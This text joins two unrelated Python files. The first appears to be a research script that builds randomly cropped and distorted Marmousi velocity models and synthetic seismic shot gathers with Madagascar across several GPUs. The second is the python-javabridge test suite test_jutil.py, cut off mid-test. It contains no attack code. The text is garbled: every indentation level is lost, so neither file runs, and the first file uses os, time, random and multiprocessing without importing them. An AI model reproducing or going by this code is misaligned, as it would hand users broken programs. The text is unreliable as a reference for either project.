import m8r as sf
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import numpy.matlib as matlib
import pydot
#plt.rcParams.update({'font.size': 5002})
#plt.rcParams['figure.figsize'] = [10, 5]
import seaborn
import tensorflow as tf
# images
from IPython import get_ipython
from keras import backend as K
from keras.utils import multi_gpu_model
from numpy.random import randint, seed
from scipy import ndimage
from skimage.transform import resize
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
#import styler
from myutils import (cd, cmd, const, elastic_transform, plt_nb_T, toc, aug_flip,
merge_dict, np_to_rsf, rsf_to_np, nrms, tf_random_flip_channels)
from myutils import const as c
seed()
# set up matplotlib
matplotlib.rc('image', cmap='RdBu_r')
seaborn.set_context('paper', font_scale=5)
CUDA_VISIBLE_DEVICES = "1,2,3"
os.environ["CUDA_VISIBLE_DEVICES"]=CUDA_VISIBLE_DEVICES
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
# Madagascar binaries will be stored in DATAPATH (RAM on Linux recommended)
cmd("mkdir /dev/shm/RSFTMP")
cmd("chmod 777 /dev/shm/RSFTMP")
os.environ["DATAPATH"]="/dev/shm/RSFTMP/"
#%%
alpha_deform = 500
sigma_deform = 50
def generate_model(model_input=c.trmodel,
model_output="marm.rsf",
dx=c.dx,
stretch_X=1,
training_flag=False,
random_state_number=c.random_state_number,
distort_flag=True,
crop_flag=True,
verbose=False,
test_flag=False,
show_flag=False):
# downscale marmousi
#def rescale_to_dx(rsf_file_in, rsf_file_out, dx)
model_orig = sf.Input(model_input)
vel = model_orig.read()
if test_flag:
n_cut = int(((const.sxbeg + const.gxbeg) * const.dx) // (model_orig.float("d1")))
vel = np.concatenate((vel[-n_cut:,:], np.flipud(vel), vel[:n_cut,:]), axis = 0)
else:
vel = np.concatenate((vel, np.flipud(vel), vel), axis = 0)
if show_flag:
np.random.RandomState(random_state_number)
random.seed(random_state_number)
np.random.seed(random_state_number)
if crop_flag:
vel_log_res = vel
#vel_log_res = resize(vel_log_res[:,:], (np.shape(vel)[0]//2, np.shape(vel)[1]//2))
if verbose:
print(f"Random state number = {random_state_number}")
#vel = resize(vel_log_res, vel.shape)
l0 = randint(np.shape(vel)[0])
#print(f"l0={l0}")
h0 = min(l0 + np.shape(vel)[0]//4 + randint(np.shape(vel)[0]//2),
np.shape(vel)[0])
l1 = randint(np.shape(vel)[1]//3)
h1 = min(l1 + np.shape(vel)[1]//3 + randint(np.shape(vel)[1]//2),
np.shape(vel)[1])
if verbose:
print(l0, l1, h0, h1)
vel_log_res = vel_log_res[l0:h0, l1:h1]
vel = resize(vel_log_res, vel.shape)
# we downscale
scale_factor = dx / model_orig.float("d1")
vel = resize(vel[:,:], (stretch_X*np.shape(vel)[0]//scale_factor, np.shape(vel)[1]//scale_factor))
if verbose:
print(np.shape(vel))
print(f"Model downscaled {scale_factor} times to {dx} meter sampling")
if stretch_X != 1:
print(f"Model stretched {stretch_X} times to {dx} meter sampling \n")
# we concatenate horizontally, this is confusing because of flipped axis in madagascar
vel = np.atleast_3d(vel)
if distort_flag:
vel = elastic_transform(vel, alpha_deform, sigma_deform, v_dx=dx, random_state_number=random_state_number)
vel = np.squeeze(vel)
if distort_flag:
vel_alpha = (0.8+0.4*resize(np.random.rand(5,10), vel.shape))
#print(vel_alpha)
vel *= vel_alpha
# add water
# vel = np.concatenate((1500*np.ones((vel.shape[0], 20)), vel),
# axis=1)
#vel = ndimage.median_filter(vel, size=(7,3))
#vel = 1500 * np.ones_like(vel)
if verbose:
print(f"Writing to {model_output}")
np_to_rsf(vel, model_output)
return vel
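# Hedged usage sketch (the default model_input/dx come from the `const`
# module and are assumptions here):
#   vel = generate_model(model_output="marm.rsf", stretch_X=1,
#                        random_state_number=42)
# returns the generated velocity model as a numpy array and writes it to
# marm.rsf via np_to_rsf.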
def show_model_generation():
stretch_X_train = c.stretch_X_train
vel = generate_model(stretch_X=stretch_X_train, training_flag=False, crop_flag=False, distort_flag=False, random_state_number=randint(10000))
vel = rsf_to_np("marmvel.hh")
plt_nb_T(aug_flip(vel), dx=4, dz=4, fname="../latex/Fig/marm_aug")
vel = generate_model(stretch_X=stretch_X_train, distort_flag=False, random_state_number=c.random_state_number, show_flag=True)
plt_nb_T(vel, fname="../latex/Fig/cropMarm")
N = np.shape(vel)
vel_example = elastic_transform(np.atleast_3d(vel), alpha_deform, sigma_deform,
random_state_number=c.random_state_number, plot_name="Normal")
N = np.shape(vel)
vel_example = generate_model(stretch_X=stretch_X_train, training_flag=True, random_state_number=c.random_state_number, show_flag=True)
vel1 = generate_model(stretch_X=stretch_X_train, training_flag=False, random_state_number=randint(10000))
vel2 = generate_model(stretch_X=stretch_X_train, training_flag=False, random_state_number=randint(10000))
vel3 = generate_model(stretch_X=stretch_X_train, training_flag=False, random_state_number=randint(10000))
vel4 = generate_model(stretch_X=stretch_X_train, training_flag=False, random_state_number=randint(10000))
plt_nb_T(np.concatenate((vel_example, vel1, vel2, vel3, vel4), axis=1), fname="../latex/Fig/random_model_example")
# model data and sort into CMPs function
def generate_rsf_data(model_name="marm.rsf", central_freq=c.central_freq, dt=c.dt, dx=c.dx,
nt=c.nt, sxbeg=c.sxbeg, gxbeg=c.gxbeg, szbeg=c.szbeg,
jsx=c.jsx, jgx=c.jgx, jdt=c.jdt,
logs_out="logs.rsf", shots_out="shots_cmp.rsf",
full_shots_out=None):
#get size of the model
model_orig = sf.Input(model_name)
Nx = model_orig.int("n2")
print(Nx)
ns = (Nx - 2*sxbeg)//jgx
ng = 2*(sxbeg-gxbeg)//jgx + 1
print(f"Total number of shots = {ns}")
t_start = time.time()
cmd((f"sfgenshots < {model_name} csdgather=y fm={central_freq} amp=1 dt={dt} ns={ns} ng={ng} nt={nt} "
f"sxbeg={sxbeg} chk=n szbeg={szbeg} jsx={jgx} jsz=0 gxbeg={gxbeg} gzbeg={szbeg} jgx={jgx} jgz=0 > shots.rsf"))
print(f"Modeling time for {ns} shots = {time.time()-t_start}")
if full_shots_out != None:
cmd(f"sfcp < shots.rsf > {full_shots_out}")
# ## Analyze and filter the data set generated
# correct header and reduce sampling in time jdt (usually 4) times
cmd(f"sfput < shots.rsf d3={jgx*dx} | sfwindow j1={jdt} | sfbandpass flo=2 fhi=4 > shots_decimated.rsf")
cmd(f"sfrm shots.rsf")
# sort into cmp gathers and discard odd cmps and not full cmps
cmd(f"sfshot2cmp < shots_decimated.rsf half=n | sfwindow j3=2 f3={ng//2} n3={ns} > {shots_out}")
print(f"sfshot2cmp < shots_decimated.rsf half=n | sfwindow j3=2 f3={ng//2} n3={ns} > {shots_out}")
# cmd(f"sfrm shots_decimated.rsf")
# cmd(f"sfrm shots_decimated.rsf")
# create the logs -- training outputs
cmd(f"sfsmooth < {model_name} rect2=2 | sfwindow f2={sxbeg} j2={jsx} n2={ns} > {logs_out}")
#cmd(f"sfin < {logs_out}")
return 0
#@profile
def generate_rsf_data_multi(model_name="marm.rsf", central_freq=c.central_freq, dt=c.dt,
nt=c.nt, sxbeg=c.sxbeg, gxbeg=c.gxbeg, szbeg=c.szbeg,
jsx=c.jsx, jgx=c.jgx, jdt=c.jdt,
logs_out="logs.rsf", shots_out="shots_cmp.rsf", iShotBlock=None):
cmd(f"mkdir /dev/shm/RSFTMP/data_{iShotBlock}")
cmd(f"chmod 777 /dev/shm/RSFTMP/data_{iShotBlock}")
os.environ["DATAPATH"]=f"/dev/shm/RSFTMP/data_{iShotBlock}"
cmd(f"echo $DATAPATH")
cmd(f"mkdir data_{iShotBlock}")
seed()
#cmd(f"sfwindow < overthrust3D.hh n3=120 f1={iShotBlock*randint(0,1e7) % 400} n1=1 | sftransp | sfadd scale=1000 | sfput d1=25 d2=25 --out=stdout > data_{iShotBlock}/overthrust2D.hh")
#cmd(f"cp {c.trmodel} data_{iShotBlock}/")
with cd(f"data_{iShotBlock}"):
_vel = generate_model(model_input=f"../{c.trmodel}", random_state_number=(iShotBlock + randint(0,1e7)))
#plt_nb_T(_vel)
generate_rsf_data()
##%%
def generate_all_data(random_model_repeat=c.random_model_repeat):
K.clear_session()
start_modeling_time = time.time()
procs = []
for iShotBlock in range(random_model_repeat):
# we run modeling on 1-3 GPUs, GPU 0 is for the network
os.environ["CUDA_VISIBLE_DEVICES"] = str((iShotBlock % 3) + 1)
proc = multiprocessing.Process(target=generate_rsf_data_multi, kwargs ={'iShotBlock' : iShotBlock})
proc.start()
procs.append(proc)
if len(procs) > 100:
for proc in procs[:50]:
proc.join()
procs = procs[50:]
for proc in procs:
proc.join()
print(f"Time for modeling = {toc(start_modeling_time)}")
start_merging_rsf_time = time.time()
cmd(f"sfcat data_*/shots_cmp.rsf axis=4 > shots_cmp_full.rsf")
cmd(f"sfcat data_*/logs.rsf axis=3 > logs_full.rsf")
print(f"Time for merging rsf files = {toc(start_merging_rsf_time)}")
os.environ["CUDA_VISIBLE_DEVICES"]=CUDA_VISIBLE_DEVICES
# generate_all_data()
if __name__ == "__main__":
time_start = time.time()
cmd("rm new_data_ready")
print("LOOOOOOOOOOOOOOOOP for data generation started")
sleep_counter = 0
while True:
if os.path.exists('training_finished'):
cmd("rm training_finished")
print("data generation finished as training_finished")
print(f"total execution time = {time.time()-time_start}, total idle = {sleep_counter}s")
quit()
elif os.path.exists('new_data_ready'):
sleep_counter += 1
print(f"network is not ready for new data, sleep {sleep_counter} sec", end='\r')
time.sleep(1)
else:
generate_all_data()
cmd("touch new_data_ready")
|
test_jutil.py
|
'''test_jutil.py - test the high-level interface
python-javabridge is licensed under the BSD license. See the
accompanying file LICENSE for details.
Copyright (c) 2003-2009 Massachusetts Institute of Technology
Copyright (c) 2009-2013 Broad Institute
All rights reserved.
'''
from __future__ import absolute_import
import gc
import os
import random # <AK> was: numpy as np
import threading
import unittest
import sys
import javabridge
# Monkey patch some half-correct implementations of methods that only
# appeared in Python 2.7.
if not hasattr(unittest.TestCase, 'assertIn'): # pragma: no cover # <AK> added
unittest.TestCase.assertIn = lambda self, a, b: self.assertTrue(a in b)
if not hasattr(unittest.TestCase, 'assertNotIn'): # pragma: no cover # <AK> added
unittest.TestCase.assertNotIn = lambda self, a, b: self.assertTrue(a not in b)
if not hasattr(unittest.TestCase, 'assertSequenceEqual'): # pragma: no cover # <AK> added
unittest.TestCase.assertSequenceEqual = lambda self, a, b: self.assertTrue([aa == bb for aa, bb in zip(a, b)])
class TestJutil(unittest.TestCase):
def setUp(self):
self.env = javabridge.attach()
def tearDown(self):
javabridge.detach()
def test_01_01_to_string(self):
jstring = self.env.new_string_utf("Hello, world")
self.assertEqual(javabridge.to_string(jstring), "Hello, world")
def test_01_02_make_instance(self):
jobject = javabridge.make_instance("java/lang/Object", "()V")
self.assertTrue(javabridge.to_string(jobject).startswith("java.lang.Object"))
# <AK> added
with self.assertRaisesRegex(javabridge.JavaError,
'Could not find constructor with signature = '
'"\(\)V"'):
jobject = javabridge.make_instance("java/lang/Class", "()V")
# </AK>
def test_01_03_call(self):
jstring = self.env.new_string_utf("Hello, world")
self.assertEqual(javabridge.call(jstring, "charAt", "(I)C", 0), "H")
def test_01_03_01_static_call(self):
result = javabridge.static_call("Ljava/lang/String;", "valueOf",
"(I)Ljava/lang/String;",123)
self.assertEqual(result, "123")
# <AK> added
with self.assertRaisesRegex(javabridge.JavaError,
'Could not find method name = "unknown method" '
'with signature = "\(I\)Ljava/lang/String;"'):
result = javabridge.static_call("Ljava/lang/String;", "unknown method",
"(I)Ljava/lang/String;",123)
# </AK>
def test_01_04_make_method(self):
env = self.env
class String(object):
def __init__(self):
self.o = env.new_string_utf("Hello, world")
charAt = javabridge.make_method("charAt", "(I)C", "My documentation")
s = String()
self.assertEqual(s.charAt.__doc__, "My documentation")
self.assertEqual(s.charAt(0), "H")
def test_01_05_00_get_static_field(self):
klass = self.env.find_class("java/lang/Short")
self.assertEqual(javabridge.get_static_field(klass, "MAX_VALUE", "S"), 2**15 - 1)
def test_01_05_01_no_field_for_get_static_field(self):
def fn():
javabridge.get_static_field(
'java/lang/Object', "NoSuchField", "I")
self.assertRaises(javabridge.JavaException, fn)
def test_01_05_02_no_class_for_get_static_field(self):
def fn():
javabridge.get_static_field(
'no/such/class', "field", "I")
self.assertRaises(javabridge.JavaException, fn)
def test_01_05_03_set_static_field(self):
class_name = "org/cellprofiler/javabridge/test/RealRect"
test_cases = (
("fs_boolean", "Z", True), # <AK> added
("fs_char", "C", "A"),
("fs_byte", "B", 3),
("fs_short", "S", 15),
("fs_int", "I", 392),
("fs_long", "J", -14),
("fs_float", "F", 1.03),
("fs_double", "D", -889.1),
("fs_object", "Ljava/lang/Object;",
javabridge.make_instance("java/lang/Integer", "(I)V", 15)),
("fs_object", "Ljava/lang/Object;", None))
for field_name, signature, value in test_cases:
javabridge.set_static_field(class_name, field_name, signature, value)
v = javabridge.get_static_field(class_name, field_name, signature)
if isinstance(value, float):
self.assertAlmostEqual(v, value)
elif isinstance(value, javabridge.JB_Object):
self.assertTrue(javabridge.call(
value, "equals", "(Ljava/lang/Object;)Z", v))
else:
self.assertEqual(v, value)
def test_01_05_04_no_field_for_set_static_field(self):
def fn():
javabridge.set_static_field(
'java/lang/Object', "NoSuchField", "I", 5)
self.assertRaises(javabridge.JavaException, fn)
def test_01_05_05_no_class_for_set_static_field(self):
def fn():
javabridge.set_static_field(
'no/such/class', "field", "I", 5)
self.assertRaises(javabridge.JavaException, fn)
def test_01_06_get_enumeration_wrapper(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
keys = javabridge.call(properties, "keys", "()Ljava/util/Enumeration;")
enum = javabridge.get_enumeration_wrapper(keys)
has_java_vm_name = False
while(enum.hasMoreElements()):
key = javabridge.to_string(enum.nextElement())
if key == "java.vm.name":
has_java_vm_name = True
self.assertTrue(has_java_vm_name)
def test_01_07_get_dictionary_wrapper(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
self.assertTrue(d.size() > 10)
self.assertFalse(d.isEmpty())
keys = javabridge.get_enumeration_wrapper(d.keys())
values = javabridge.get_enumeration_wrapper(d.elements())
n_elems = d.size()
for i in range(n_elems):
self.assertTrue(keys.hasMoreElements())
key = javabridge.to_string(keys.nextElement())
self.assertTrue(values.hasMoreElements())
value = javabridge.to_string(values.nextElement())
self.assertEqual(javabridge.to_string(d.get(key)), value)
self.assertFalse(keys.hasMoreElements())
self.assertFalse(values.hasMoreElements())
def test_01_08_jenumeration_to_string_list(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
keys = javabridge.jenumeration_to_string_list(d.keys())
enum = javabridge.get_enumeration_wrapper(d.keys())
for i in range(d.size()):
key = javabridge.to_string(enum.nextElement())
self.assertEqual(key, keys[i])
def test_01_09_jdictionary_to_string_dictionary(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
pyd = javabridge.jdictionary_to_string_dictionary(properties)
keys = javabridge.jenumeration_to_string_list(d.keys())
for key in keys:
value = javabridge.to_string(d.get(key))
self.assertEqual(pyd[key], value)
def test_01_10_make_new(self):
env = self.env
class MyClass:
new_fn = javabridge.make_new("java/lang/Object", '()V')
def __init__(self):
self.new_fn()
my_instance = MyClass()
def test_01_11_class_for_name(self):
c = javabridge.class_for_name('java.lang.String')
name = javabridge.call(c, 'getCanonicalName', '()Ljava/lang/String;')
self.assertEqual(name, 'java.lang.String')
def test_02_01_access_object_across_environments(self):
#
# Create an object in one environment, close the environment,
# open a second environment, then use it and delete it.
#
env = self.env
self.assertTrue(isinstance(env,javabridge.JB_Env))
class MyInteger:
new_fn = javabridge.make_new("java/lang/Integer",'(I)V')
def __init__(self, value):
self.new_fn(value)
intValue = javabridge.make_method("intValue", '()I')
my_value = 543
my_integer=MyInteger(my_value)
def run(my_integer = my_integer):
env = javabridge.attach()
self.assertEqual(my_integer.intValue(),my_value)
javabridge.detach()
t = threading.Thread(target = run)
t.start()
t.join()
def test_02_02_delete_in_environment(self):
env = self.env
self.assertTrue(isinstance(env, javabridge.JB_Env))
class MyInteger:
new_fn = javabridge.make_new("java/lang/Integer",'(I)V')
def __init__(self, value):
self.new_fn(value)
intValue = javabridge.make_method("intValue", '()I')
my_value = 543
my_integer=MyInteger(my_value)
def run(my_integer = my_integer):
env = javabridge.attach()
self.assertEqual(my_integer.intValue(),my_value)
del my_integer
javabridge.detach()
t = threading.Thread(target = run)
t.start()
t.join()
def test_02_03_death_and_resurrection(self):
'''Put an object into another in Java, delete it in Python and recover it'''
random.seed(24) # <AK> was: np.random.seed(24)
my_value = random.randrange(0, 1000) # <AK> was: np.random.randint(0, 1000)
jobj = javabridge.make_instance("java/lang/Integer", "(I)V", my_value)
integer_klass = self.env.find_class("java/lang/Integer")
jcontainer = self.env.make_object_array(1, integer_klass)
self.env.set_object_array_element(jcontainer, 0, jobj)
del jobj
gc.collect()
jobjs = self.env.get_object_array_elements(jcontainer)
jobj = jobjs[0]
self.assertEqual(javabridge.call(jobj, "intValue", "()I"), my_value)
def test_02_04_non_java_thread_deletes_it(self):
'''Delete a Java object on a not-Java thread'''
refs = [javabridge.make_instance("java/lang/Integer", "(I)V", 5)]
def run():
del refs[0]
gc.collect()
t = threading.Thread(target = run)
t.start()
t.join()
def test_03_01_cw_from_class(self):
'''Get a class wrapper from a class'''
c = javabridge.get_class_wrapper(javabridge.make_instance('java/lang/Integer', '(I)V',
14))
# <AK> added
self.assertIn("public static int java.lang.Integer.divideUnsigned(int,int)\n", repr(c))
def test_03_02_cw_from_string(self):
'''Get a class wrapper from a string'''
c = javabridge.get_class_wrapper("java.lang.Number")
def test_03_03_cw_get_classes(self):
c = javabridge.get_class_wrapper('java.lang.Number')
classes = c.getClasses()
self.assertEqual(len(javabridge.get_env().get_object_array_elements(classes)), 0)
def test_03_04_cw_get_annotation(self):
c = javabridge.get_class_wrapper('java.security.Identity')
annotation = c.getAnnotation(javabridge.class_for_name('java.lang.Deprecated'))
self.assertTrue(annotation is not None)
def test_03_05_cw_get_annotations(self):
c = javabridge.get_class_wrapper('java.security.Identity')
annotations = c.getAnnotations()
annotations = javabridge.get_env().get_object_array_elements(annotations)
self.assertEqual(len(annotations), 1)
self.assertTrue(javabridge.to_string(annotations[0]).startswith('@java.lang.Deprecated'))
def test_03_06_cw_get_constructors(self):
c = javabridge.get_class_wrapper('java.lang.String')
constructors = c.getConstructors()
constructors = javabridge.get_env().get_object_array_elements(constructors)
self.assertEqual(len(constructors), 15)
def test_03_07_cw_get_fields(self):
c = javabridge.get_class_wrapper('java.lang.String')
fields = c.getFields()
fields = javabridge.get_env().get_object_array_elements(fields)
self.assertEqual(len(fields), 1)
self.assertEqual(javabridge.call(fields[0], 'getName', '()Ljava/lang/String;'),
"CASE_INSENSITIVE_ORDER")
def test_03_08_cw_get_field(self):
c = javabridge.get_class_wrapper('java.lang.String')
field = c.getField('CASE_INSENSITIVE_ORDER')
modifiers = javabridge.call(field, 'getModifiers', '()I')
static = javabridge.get_static_field('java/lang/reflect/Modifier','STATIC','I')
self.assertEqual((modifiers & static), static)
def test_03_09_cw_get_method(self):
sclass = javabridge.class_for_name('java.lang.String')
iclass = javabridge.get_static_field('java/lang/Integer', 'TYPE',
'Ljava/lang/Class;')
c = javabridge.get_class_wrapper('java.lang.String')
m = c.getMethod('charAt', [ iclass ])
self.assertEqual(javabridge.to_string(javabridge.call(m, 'getReturnType', '()Ljava/lang/Class;')), 'char')
m = c.getMethod('concat', [ sclass])
self.assertEqual(javabridge.to_string(javabridge.call(m, 'getReturnType', '()Ljava/lang/Class;')),
'class java.lang.String')
def test_03_10_cw_get_methods(self):
c = javabridge.get_class_wrapper('java.lang.String')
mmm = javabridge.get_env().get_object_array_elements(c.getMethods())
self.assertTrue(any([javabridge.call(m, 'getName', '()Ljava/lang/String;') == 'concat'
for m in mmm]))
def test_03_11_cw_get_constructor(self):
c = javabridge.get_class_wrapper('java.lang.String')
sclass = javabridge.class_for_name('java.lang.String')
constructor = c.getConstructor([sclass])
self.assertEqual(javabridge.call(constructor, 'getName', '()Ljava/lang/String;'),
'java.lang.String')
def test_04_01_field_get(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
v = f.get(None)
self.assertEqual(javabridge.to_string(v), '127')
def test_04_02_field_name(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
self.assertEqual(f.getName(), 'MAX_VALUE')
def test_04_03_field_type(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
t = f.getType()
self.assertEqual(javabridge.to_string(t), 'byte')
def test_04_04_field_modifiers(self):
# <AK> added
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
m = f.getModifiers()
self.assertIsInstance(m, list)
self.assertEqual(set(m), {'PUBLIC', 'STATIC', 'FINAL'})
def test_05_01_run_script(self):
self.assertEqual(javabridge.run_script("2+2"), 4)
def test_05_02_run_script_with_inputs(self):
self.assertEqual(javabridge.run_script("a+b", bindings_in={"a":2, "b":3}), 5)
def test_05_03_run_script_with_outputs(self):
outputs = { "result": None}
javabridge.run_script("var result = 2+2;", bindings_out=outputs)
self.assertEqual(outputs["result"], 4)
def test_06_01_execute_asynch_main(self):
javabridge.execute_runnable_in_main_thread(javabridge.run_script(
"new java.lang.Runnable() { run:function() {}};"))
def test_06_02_execute_synch_main(self):
javabridge.execute_runnable_in_main_thread(javabridge.run_script(
"new java.lang.Runnable() { run:function() {}};"), True)
def test_06_03_future_main(self):
c = javabridge.run_script("""
new java.util.concurrent.Callable() {
call: function() { return 2+2; }};""")
result = javabridge.execute_future_in_main_thread(
javabridge.make_future_task(c, fn_post_process=javabridge.unwrap_javascript))
self.assertEqual(result, 4)
def test_07_01_wrap_future(self):
future = javabridge.run_script("""
new java.util.concurrent.FutureTask(
new java.util.concurrent.Callable() {
call: function() { return 2+2; }});""")
wfuture = javabridge.get_future_wrapper(
future, fn_post_process=javabridge.unwrap_javascript)
self.assertFalse(wfuture.isDone())
self.assertFalse(wfuture.isCancelled())
wfuture.run()
self.assertTrue(wfuture.isDone())
self.assertEqual(wfuture.get(), 4)
def test_07_02_cancel_future(self):
future = javabridge.run_script("""
new java.util.concurrent.FutureTask(
new java.util.concurrent.Callable() {
call: function() { return 2+2; }});""")
wfuture = javabridge.get_future_wrapper(
future, fn_post_process=javabridge.unwrap_javascript)
wfuture.cancel(True)
self.assertTrue(wfuture.isCancelled())
self.assertRaises(javabridge.JavaException, wfuture.get)
def test_07_03_make_future_task_from_runnable(self):
future = javabridge.make_future_task(
javabridge.run_script("new java.lang.Runnable() { run: function() {}};"),
11)
future.run()
self.assertEqual(javabridge.call(future.get(), "intValue", "()I"), 11)
def test_07_04_make_future_task_from_callable(self):
call_able = javabridge.run_script("""
new java.util.concurrent.Callable() {
call: function() { return 2+2; }};""")
future = javabridge.make_future_task(
call_able, fn_post_process=javabridge.unwrap_javascript)
future.run()
self.assertEqual(future.get(), 4)
def test_08_01_wrap_collection(self):
c = javabridge.make_instance("java/util/HashSet", "()V")
w = javabridge.get_collection_wrapper(c)
self.assertFalse(hasattr(w, "addI"))
self.assertEqual(w.size(), 0)
self.assertEqual(len(w), 0)
self.assertTrue(w.isEmpty())
def test_08_02_add(self):
c = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
self.assertTrue(c.add("Foo"))
self.assertEqual(len(c), 1)
self.assertFalse(c.isEmpty())
def test_08_03_contains(self):
c = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c.add("Foo")
self.assertTrue(c.contains("Foo"))
self.assertFalse(c.contains("Bar"))
self.assertIn("Foo", c)
self.assertNotIn("Bar", c)
def test_08_04_addAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c2.addAll(c1.o)
self.assertIn("Foo", c2)
def test_08_05__add__(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c3 = c1 + c2
for k in ("Foo", "Bar", "Baz"):
self.assertIn(k, c3)
c4 = c3 + ["Hello", "World"]
self.assertIn("Hello", c4)
self.assertIn("World", c4)
def test_08_06__iadd__(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c2 += c1
for k in ("Foo", "Bar", "Baz"):
self.assertIn(k, c2)
c2 += ["Hello", "World"]
self.assertIn("Hello", c2)
self.assertIn("World", c2)
def test_08_07_contains_all(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
self.assertFalse(c2.containsAll(c1.o))
c2 += c1
self.assertTrue(c2.containsAll(c1.o))
def test_08_08_remove(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c1.remove("Foo")
self.assertNotIn("Foo", c1)
def test_08_09_removeAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Foo")
c1.removeAll(c2)
self.assertNotIn("Foo", c1)
def test_08_10_retainAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Foo")
c1.retainAll(c2)
self.assertIn("Foo", c1)
self.assertNotIn("Bar", c1)
def test_08_11_toArray(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
result = [javabridge.to_string(x) for x in c1.toArray()]
self.assertIn("Foo", result)
self.assertIn("Bar", result)
def test_08_12_make_list(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertSequenceEqual(l, ["Foo", "Bar"])
self.assertTrue(hasattr(l, "addI"))
def test_08_13_addI(self):
l = javabridge.make_list(["Foo", "Bar"])
l.addI(1, "Baz")
self.assertSequenceEqual(l, ["Foo", "Baz", "Bar"])
def test_08_14_addAllI(self):
l = javabridge.make_list(["Foo", "Bar"])
l.addAllI(1, javabridge.make_list(["Baz"]))
self.assertSequenceEqual(l, ["Foo", "Baz", "Bar"])
def test_08_15_indexOf(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertEqual(l.indexOf("Bar"), 1)
self.assertEqual(l.lastIndexOf("Foo"), 0)
def test_08_16_get(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertEqual(l.get(1), "Bar")
def test_08_17_set(self):
l = javabridge.make_list(["Foo", "Bar"])
l.set(1, "Baz")
self.assertEqual(l.get(1), "Baz")
def test_08_18_subList(self):
l = javabridge.make_list(["Foo", "Bar", "Baz", "Hello", "World"])
self.assertSequenceEqual(l.subList(1, 3), ["Bar", "Baz"])
def test_08_19__getitem__(self):
l = javabridge.make_list(["Foo", "Bar", "Baz", "Hello", "World"])
self.assertEqual(l[1], "Bar")
self.assertEqual(l[-2], "Hello")
self.assertSequenceEqual(l[1:3], ["Bar", "Baz"])
self.assertSequenceEqual(l[::3], ["Foo", "Hello"])
def test_08_20__setitem__(self):
l = javabridge.make_list(["Foo", "Bar"])
l[1] = "Baz"
self.assertEqual(l.get(1), "Baz")
def test_08_21__delitem__(self):
l = javabridge.make_list(["Foo", "Bar", "Baz"])
del l[1]
self.assertSequenceEqual(l, ["Foo", "Baz"])
def test_09_01_00_get_field(self):
o = javabridge.make_instance("org/cellprofiler/javabridge/test/RealRect", "(DDDD)V", 1, 2, 3, 4)
self.assertEqual(javabridge.get_field(o, "x", "D"), 1)
def test_09_02_get_field_no_such_field(self):
def fn():
o = javabridge.make_instance("java/lang/Object", "()V")
javabridge.get_field(o, "NoSuchField", "I")
self.assertRaises(javabridge.JavaException, fn)
def test_09_03_set_field(self):
class_name = "org/cellprofiler/javabridge/test/RealRect"
o = javabridge.make_instance(class_name, "()V")
test_cases = (
("f_boolean", "Z", True), # <AK> added
("f_char", "C", "A"),
("f_byte", "B", 3),
("f_short", "S", 15),
("f_int", "I", 392),
("f_long", "J", -14),
("f_float", "F", 1.03),
("f_double", "D", -889.1),
("f_object", "Ljava/lang/Object;",
javabridge.make_instance("java/lang/Integer", "(I)V", 15)),
("f_object", "Ljava/lang/Object;", None))
for field_name, signature, value in test_cases:
javabridge.set_field(o, field_name, signature, value)
v = javabridge.get_field(o, field_name, signature)
if isinstance(value, float):
self.assertAlmostEqual(v, value)
elif isinstance(value, javabridge.JB_Object):
self.assertTrue(javabridge.call(
value, "equals", "(Ljava/lang/Object;)Z", v))
else:
self.assertEqual(v, value)
def test_09_04_set_field_no_such_field(self):
def fn():
o = javabridge.make_instance("java/lang/Object", "()V")
